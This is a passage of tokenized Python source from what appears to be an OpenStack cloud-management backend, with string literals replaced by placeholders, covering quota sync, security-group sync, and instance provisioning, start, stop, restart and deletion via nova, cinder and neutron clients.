'<STR_LIT>' , lambda x : x ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , self . get_backend_ram_size ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> } <EOL> neutron_quota_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> } <EOL> def extract_backend_quotas ( mapping ) : <EOL> return { <EOL> backend_name : get_backend_value ( quotas [ name ] ) <EOL> for name , ( backend_name , get_backend_value ) in mapping . items ( ) <EOL> if name in quotas and quotas [ name ] is not None <EOL> } <EOL> cinder_quotas = extract_backend_quotas ( cinder_quota_mapping ) <EOL> nova_quotas = extract_backend_quotas ( nova_quota_mapping ) <EOL> neutron_quotas = extract_backend_quotas ( neutron_quota_mapping ) <EOL> if not ( cinder_quotas or nova_quotas or neutron_quotas ) : <EOL> return <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> try : <EOL> if cinder_quotas : <EOL> cinder = self . create_cinder_client ( session ) <EOL> cinder . quotas . update ( membership . tenant_id , ** cinder_quotas ) <EOL> except cinder_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , membership , cinder_quotas ) <EOL> try : <EOL> if nova_quotas : <EOL> nova = self . create_nova_client ( session ) <EOL> nova . quotas . update ( membership . tenant_id , ** nova_quotas ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , membership , nova_quotas ) <EOL> try : <EOL> if neutron_quotas : <EOL> neutron = self . create_neutron_client ( session ) <EOL> neutron . update_quota ( membership . tenant_id , { '<STR_LIT>' : neutron_quotas } ) <EOL> except neutron_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , membership , neutron_quotas ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , membership , quotas ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> def push_security_groups ( self , membership , is_membership_creation = False ) : <EOL> logger . debug ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nc_security_groups = membership . security_groups . all ( ) <EOL> if not is_membership_creation : <EOL> nc_security_groups = nc_security_groups . filter ( state__in = SynchronizationStates . STABLE_STATES ) <EOL> try : <EOL> backend_security_groups = dict ( ( str ( g . id ) , g ) for g in nova . security_groups . list ( ) if g . name != '<STR_LIT:default>' ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , membership . id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nonexistent_groups = [ ] <EOL> unsynchronized_groups = [ ] <EOL> extra_group_ids = backend_security_groups . keys ( ) <EOL> for nc_group in nc_security_groups : <EOL> if nc_group . backend_id not in backend_security_groups : <EOL> nonexistent_groups . append ( nc_group ) <EOL> else : <EOL> backend_group = backend_security_groups [ nc_group . backend_id ] <EOL> if not self . _are_security_groups_equal ( backend_group , nc_group ) : <EOL> unsynchronized_groups . append ( nc_group ) <EOL> extra_group_ids . remove ( nc_group . backend_id ) <EOL> for backend_group_id in extra_group_ids : <EOL> try : <EOL> self . delete_security_group ( backend_group_id , nova = nova ) <EOL> except CloudBackendError , e : <EOL> pass <EOL> for nc_group in unsynchronized_groups : <EOL> if nc_group . state in SynchronizationStates . STABLE_STATES : <EOL> nc_group . schedule_syncing ( ) <EOL> nc_group . save ( ) <EOL> send_task ( membership . security_groups . model . _meta . app_label , '<STR_LIT>' ) ( nc_group . uuid . hex ) <EOL> for nc_group in nonexistent_groups : <EOL> if nc_group . state in SynchronizationStates . STABLE_STATES : <EOL> nc_group . schedule_syncing ( ) <EOL> nc_group . save ( ) <EOL> send_task ( membership . security_groups . model . _meta . app_label , '<STR_LIT>' ) ( nc_group . uuid . hex ) <EOL> def create_security_group ( self , security_group , nova ) : <EOL> logger . debug ( '<STR_LIT>' , security_group . uuid ) <EOL> try : <EOL> backend_security_group = nova . security_groups . create ( name = security_group . name , description = '<STR_LIT>' ) <EOL> security_group . backend_id = backend_security_group . id <EOL> security_group . save ( ) <EOL> self . push_security_group_rules ( security_group , nova ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , security_group . uuid ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , security_group . uuid ) <EOL> def delete_security_group ( self , backend_id , nova ) : <EOL> logger . debug ( '<STR_LIT>' , backend_id ) <EOL> try : <EOL> nova . security_groups . delete ( backend_id ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , backend_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , backend_id ) <EOL> def update_security_group ( self , security_group , nova ) : <EOL> logger . debug ( '<STR_LIT>' , security_group . uuid ) <EOL> try : <EOL> backend_security_group = nova . security_groups . find ( id = security_group . backend_id ) <EOL> if backend_security_group . name != security_group . name : <EOL> nova . security_groups . update ( <EOL> backend_security_group , name = security_group . name , description = '<STR_LIT>' ) <EOL> self . push_security_group_rules ( security_group , nova ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , security_group . uuid ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , security_group . uuid ) <EOL> def pull_security_groups ( self , membership ) : <EOL> SecurityGroup = membership . security_groups . model <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> try : <EOL> backend_security_groups = nova . security_groups . list ( ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , membership . id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nonexistent_groups = [ ] <EOL> unsynchronized_groups = [ ] <EOL> extra_groups = membership . security_groups . exclude ( <EOL> backend_id__in = [ g . id for g in backend_security_groups ] , <EOL> ) <EOL> with transaction . atomic ( ) : <EOL> for backend_group in backend_security_groups : <EOL> try : <EOL> nc_group = membership . security_groups . get ( <EOL> backend_id = backend_group . id , <EOL> ) <EOL> if not self . _are_security_groups_equal ( backend_group , nc_group ) : <EOL> unsynchronized_groups . append ( backend_group ) <EOL> except SecurityGroup . DoesNotExist : <EOL> nonexistent_groups . append ( backend_group ) <EOL> extra_groups . delete ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> for backend_group in unsynchronized_groups : <EOL> nc_security_group = membership . security_groups . get ( <EOL> backend_id = backend_group . id , <EOL> ) <EOL> if backend_group . name != nc_security_group . name : <EOL> nc_security_group . name = backend_group . name <EOL> nc_security_group . state = SynchronizationStates . IN_SYNC <EOL> nc_security_group . save ( ) <EOL> self . pull_security_group_rules ( nc_security_group , nova ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for backend_group in nonexistent_groups : <EOL> nc_security_group = membership . security_groups . create ( <EOL> backend_id = backend_group . id , <EOL> name = backend_group . name , <EOL> state = SynchronizationStates . IN_SYNC <EOL> ) <EOL> self . pull_security_group_rules ( nc_security_group , nova ) <EOL> logger . info ( '<STR_LIT>' , nc_security_group . uuid ) <EOL> def pull_instances ( self , membership ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> except cinder_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> backend_instances = nova . servers . findall ( image = '<STR_LIT>' ) <EOL> backend_instances = dict ( ( ( f . id , f ) for f in backend_instances ) ) <EOL> with transaction . atomic ( ) : <EOL> states = ( <EOL> models . Instance . States . ONLINE , <EOL> models . Instance . States . OFFLINE , <EOL> models . Instance . States . ERRED ) <EOL> nc_instances = models . Instance . objects . filter ( <EOL> state__in = states , <EOL> cloud_project_membership = membership , <EOL> ) <EOL> nc_instances = dict ( ( ( i . backend_id , i ) for i in nc_instances ) ) <EOL> backend_ids = set ( backend_instances . keys ( ) ) <EOL> nc_ids = set ( nc_instances . keys ( ) ) <EOL> for instance_id in nc_ids - backend_ids : <EOL> nc_instance = nc_instances [ instance_id ] <EOL> nc_instance . set_erred ( ) <EOL> nc_instance . save ( ) <EOL> for instance_id in nc_ids & backend_ids : <EOL> backend_instance = backend_instances [ instance_id ] <EOL> nc_instance = nc_instances [ instance_id ] <EOL> nc_instance . state = self . _get_instance_state ( backend_instance ) <EOL> if nc_instance . key_name != backend_instance . key_name : <EOL> if backend_instance . key_name is None : <EOL> nc_instance . key_name = "<STR_LIT>" <EOL> else : <EOL> nc_instance . key_name = backend_instance . key_name <EOL> nc_instance . key_fingerprint = "<STR_LIT>" <EOL> ips = self . _get_instance_ips ( backend_instance ) <EOL> nc_instance . internal_ips = ips . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nc_instance . external_ips = ips . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nc_instance . save ( ) <EOL> def pull_resource_quota ( self , membership ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> neutron = self . create_neutron_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> logger . debug ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> nova_quotas = nova . quotas . get ( tenant_id = membership . tenant_id ) <EOL> cinder_quotas = cinder . quotas . get ( tenant_id = membership . tenant_id ) <EOL> neutron_quotas = neutron . show_quota ( tenant_id = membership . tenant_id ) [ '<STR_LIT>' ] <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , membership . tenant_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , membership . tenant_id ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , self . get_core_ram_size ( nova_quotas . ram ) ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , nova_quotas . cores ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , self . get_core_disk_size ( cinder_quotas . gigabytes ) ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , nova_quotas . instances ) <EOL> def pull_resource_quota_usage ( self , membership ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> logger . debug ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> volumes = cinder . volumes . list ( ) <EOL> snapshots = cinder . volume_snapshots . list ( ) <EOL> flavors = dict ( ( flavor . id , flavor ) for flavor in nova . flavors . list ( ) ) <EOL> instances = nova . servers . list ( ) <EOL> security_groups = nova . security_groups . list ( ) <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( <EOL> '<STR_LIT>' , <EOL> membership . tenant_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' , <EOL> membership . tenant_id ) <EOL> instance_flavor_ids = [ instance . flavor [ '<STR_LIT:id>' ] for instance in instances ] <EOL> ram = <NUM_LIT:0> <EOL> vcpu = <NUM_LIT:0> <EOL> for flavor_id in instance_flavor_ids : <EOL> try : <EOL> flavor = flavors . get ( flavor_id , nova . flavors . get ( flavor_id ) ) <EOL> except nova_exceptions . NotFound : <EOL> logger . warning ( '<STR_LIT>' , flavor_id ) <EOL> continue <EOL> ram += self . get_core_ram_size ( getattr ( flavor , '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> vcpu += getattr ( flavor , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , ram ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , vcpu ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , len ( instances ) , fail_silently = True ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , len ( instances ) , fail_silently = True ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , sum ( [ self . get_core_disk_size ( v . size ) for v in volumes + snapshots ] ) ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , len ( security_groups ) ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , len ( sum ( [ sg . rules for sg in security_groups ] , [ ] ) ) ) <EOL> def pull_floating_ips ( self , membership ) : <EOL> logger . debug ( '<STR_LIT>' , membership . id ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> neutron = self . create_neutron_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> try : <EOL> backend_floating_ips = { <EOL> ip [ '<STR_LIT:id>' ] : ip <EOL> for ip in self . get_floating_ips ( membership . tenant_id , neutron ) <EOL> if ip . get ( '<STR_LIT>' ) and ip . get ( '<STR_LIT:status>' ) <EOL> } <EOL> except neutron_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nc_floating_ips = dict ( <EOL> ( ip . backend_id , ip ) for ip in membership . floating_ips . all ( ) ) <EOL> backend_ids = set ( backend_floating_ips . keys ( ) ) <EOL> nc_ids = set ( nc_floating_ips . keys ( ) ) <EOL> with transaction . atomic ( ) : <EOL> for ip_id in nc_ids - backend_ids : <EOL> ip = nc_floating_ips [ ip_id ] <EOL> ip . delete ( ) <EOL> logger . info ( '<STR_LIT>' , ip . uuid ) <EOL> for ip_id in backend_ids - nc_ids : <EOL> ip = backend_floating_ips [ ip_id ] <EOL> created_ip = membership . floating_ips . create ( <EOL> status = ip [ '<STR_LIT:status>' ] , <EOL> backend_id = ip [ '<STR_LIT:id>' ] , <EOL> address = ip [ '<STR_LIT>' ] , <EOL> backend_network_id = ip [ '<STR_LIT>' ] <EOL> ) <EOL> logger . info ( '<STR_LIT>' , created_ip . uuid ) <EOL> for ip_id in nc_ids & backend_ids : <EOL> nc_ip = nc_floating_ips [ ip_id ] <EOL> backend_ip = backend_floating_ips [ ip_id ] <EOL> if nc_ip . status != backend_ip [ '<STR_LIT:status>' ] or nc_ip . address != backend_ip [ '<STR_LIT>' ] or nc_ip . backend_network_id != backend_ip [ '<STR_LIT>' ] : <EOL> if not ( nc_ip . status == '<STR_LIT>' and backend_ip [ '<STR_LIT:status>' ] == '<STR_LIT>' ) : <EOL> nc_ip . status = backend_ip [ '<STR_LIT:status>' ] <EOL> nc_ip . address = backend_ip [ '<STR_LIT>' ] <EOL> nc_ip . backend_network_id = backend_ip [ '<STR_LIT>' ] <EOL> nc_ip . save ( ) <EOL> logger . debug ( '<STR_LIT>' , nc_ip . uuid ) <EOL> def get_resource_stats ( self , auth_url ) : <EOL> logger . debug ( '<STR_LIT>' , auth_url ) <EOL> try : <EOL> session = self . create_session ( keystone_url = auth_url ) <EOL> nova = self . create_nova_client ( session ) <EOL> stats = self . get_hypervisors_statistics ( nova ) <EOL> if '<STR_LIT>' in stats : <EOL> nc_settings = getattr ( settings , '<STR_LIT>' , { } ) <EOL> openstacks = nc_settings . get ( '<STR_LIT>' , ( ) ) <EOL> try : <EOL> openstack = next ( o for o in openstacks if o [ '<STR_LIT>' ] == auth_url ) <EOL> cpu_overcommit_ratio = openstack . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> except StopIteration as e : <EOL> logger . debug ( '<STR_LIT>' , auth_url ) <EOL> cpu_overcommit_ratio = <NUM_LIT:1> <EOL> stats [ '<STR_LIT>' ] = stats [ '<STR_LIT>' ] * cpu_overcommit_ratio <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , auth_url ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , auth_url ) <EOL> return stats <EOL> def pull_service_statistics ( self , cloud_account , service_stats = None ) : <EOL> if not service_stats : <EOL> service_stats = self . get_resource_stats ( cloud_account . auth_url ) <EOL> cloud_stats = dict ( ( s . key , s ) for s in cloud_account . stats . all ( ) ) <EOL> for key , val in service_stats . items ( ) : <EOL> stats = cloud_stats . pop ( key , None ) <EOL> if stats : <EOL> stats . value = val <EOL> stats . save ( ) <EOL> else : <EOL> cloud_account . stats . create ( key = key , value = val ) <EOL> if cloud_stats : <EOL> cloud_account . stats . delete ( key__in = cloud_stats . keys ( ) ) <EOL> return service_stats <EOL> def provision_instance ( self , instance , backend_flavor_id , system_volume_id = None , data_volume_id = None ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> image = membership . cloud . images . get ( <EOL> template = instance . template , <EOL> ) <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> neutron = self . create_neutron_client ( session ) <EOL> try : <EOL> neutron . show_network ( membership . internal_network_id ) <EOL> except neutron_exceptions . NeutronClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> membership . internal_network_id ) <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> if instance . key_name : <EOL> safe_key_name = self . sanitize_key_name ( instance . key_name ) <EOL> matching_keys = [ <EOL> key <EOL> for key in nova . keypairs . findall ( fingerprint = instance . key_fingerprint ) <EOL> if key . name . endswith ( safe_key_name ) <EOL> ] <EOL> matching_keys_count = len ( matching_keys ) <EOL> if matching_keys_count >= <NUM_LIT:1> : <EOL> if matching_keys_count > <NUM_LIT:1> : <EOL> logger . warning ( '<STR_LIT>' + <EOL> '<STR_LIT>' , <EOL> matching_keys_count , instance . key_fingerprint ) <EOL> backend_public_key = matching_keys [ <NUM_LIT:0> ] <EOL> elif matching_keys_count == <NUM_LIT:0> : <EOL> logger . error ( '<STR_LIT>' , <EOL> instance . key_fingerprint ) <EOL> instance . key_name = '<STR_LIT>' <EOL> instance . key_fingerprint = '<STR_LIT>' <EOL> backend_public_key = None <EOL> else : <EOL> backend_public_key = matching_keys [ <NUM_LIT:0> ] <EOL> else : <EOL> backend_public_key = None <EOL> backend_flavor = nova . flavors . get ( backend_flavor_id ) <EOL> if not system_volume_id : <EOL> system_volume_name = '<STR_LIT>' . format ( instance . name ) <EOL> logger . info ( '<STR_LIT>' , system_volume_name , instance . uuid ) <EOL> size = self . get_backend_disk_size ( instance . system_volume_size ) <EOL> system_volume = cinder . volumes . create ( <EOL> size = size , <EOL> display_name = system_volume_name , <EOL> display_description = '<STR_LIT>' , <EOL> imageRef = image . backend_id , <EOL> ) <EOL> system_volume_id = system_volume . id <EOL> if not data_volume_id : <EOL> data_volume_name = '<STR_LIT>' . format ( instance . name ) <EOL> logger . info ( '<STR_LIT>' , data_volume_name , instance . uuid ) <EOL> size = self . get_backend_disk_size ( instance . data_volume_size ) <EOL> data_volume = cinder . volumes . create ( <EOL> size = size , <EOL> display_name = data_volume_name , <EOL> display_description = '<STR_LIT>' , <EOL> ) <EOL> data_volume_id = data_volume . id <EOL> if not self . _wait_for_volume_status ( system_volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , system_volume_id , <EOL> ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> if not self . _wait_for_volume_status ( data_volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , data_volume_id , <EOL> ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> security_group_ids = instance . security_groups . values_list ( '<STR_LIT>' , flat = True ) <EOL> server_create_parameters = dict ( <EOL> name = instance . name , <EOL> image = None , <EOL> flavor = backend_flavor , <EOL> block_device_mapping_v2 = [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : system_volume_id , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : data_volume_id , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> ] , <EOL> nics = [ <EOL> { '<STR_LIT>' : membership . internal_network_id } <EOL> ] , <EOL> key_name = backend_public_key . name if backend_public_key is not None else None , <EOL> security_groups = security_group_ids , <EOL> ) <EOL> if membership . availability_zone : <EOL> server_create_parameters [ '<STR_LIT>' ] = membership . availability_zone <EOL> if instance . user_data : <EOL> server_create_parameters [ '<STR_LIT>' ] = instance . user_data <EOL> server = nova . servers . create ( ** server_create_parameters ) <EOL> instance . backend_id = server . id <EOL> instance . system_volume_id = system_volume_id <EOL> instance . data_volume_id = data_volume_id <EOL> instance . save ( ) <EOL> if not self . _wait_for_instance_status ( server . id , nova , '<STR_LIT>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , <EOL> ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> instance . start_time = timezone . now ( ) <EOL> instance . save ( ) <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> server = nova . servers . get ( server . id ) <EOL> fixed_address = server . addresses . values ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> except ( nova_exceptions . ClientException , KeyError , IndexError ) : <EOL> logger . exception ( '<STR_LIT>' , <EOL> instance . uuid ) <EOL> else : <EOL> instance . internal_ips = fixed_address <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . uuid ) <EOL> self . push_floating_ip_to_instance ( server , instance , nova ) <EOL> except ( glance_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> nova_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> licenses = instance . instance_licenses . all ( ) <EOL> event_logger . instance_licenses . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { <EOL> '<STR_LIT>' : instance , <EOL> '<STR_LIT>' : [ l . template_license . license_type for l in licenses ] , <EOL> '<STR_LIT>' : [ l . template_license . service_type for l in licenses ] , <EOL> } <EOL> ) <EOL> def start_instance ( self , instance ) : <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> backend_instance = nova . servers . find ( id = instance . backend_id ) <EOL> backend_instance_state = self . _get_instance_state ( backend_instance ) <EOL> if backend_instance_state == models . Instance . States . ONLINE : <EOL> logger . warning ( '<STR_LIT>' , instance . uuid ) <EOL> instance . start_time = timezone . now ( ) <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> return <EOL> nova . servers . start ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> instance . start_time = timezone . now ( ) <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> def stop_instance ( self , instance ) : <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> backend_instance = nova . servers . find ( id = instance . backend_id ) <EOL> backend_instance_state = self . _get_instance_state ( backend_instance ) <EOL> if backend_instance_state == models . Instance . States . OFFLINE : <EOL> logger . warning ( '<STR_LIT>' , instance . uuid ) <EOL> instance . start_time = None <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> return <EOL> nova . servers . stop ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> instance . start_time = None <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> def restart_instance ( self , instance ) : <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> nova . servers . reboot ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' , retries = <NUM_LIT> ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> def delete_instance ( self , instance ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> nova . servers . delete ( instance . backend_id ) <EOL> if not self . _wait_for_instance_deletion ( instance . backend_id , nova ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> else : <EOL> self . release_floating_ip_from_instance ( instance ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise 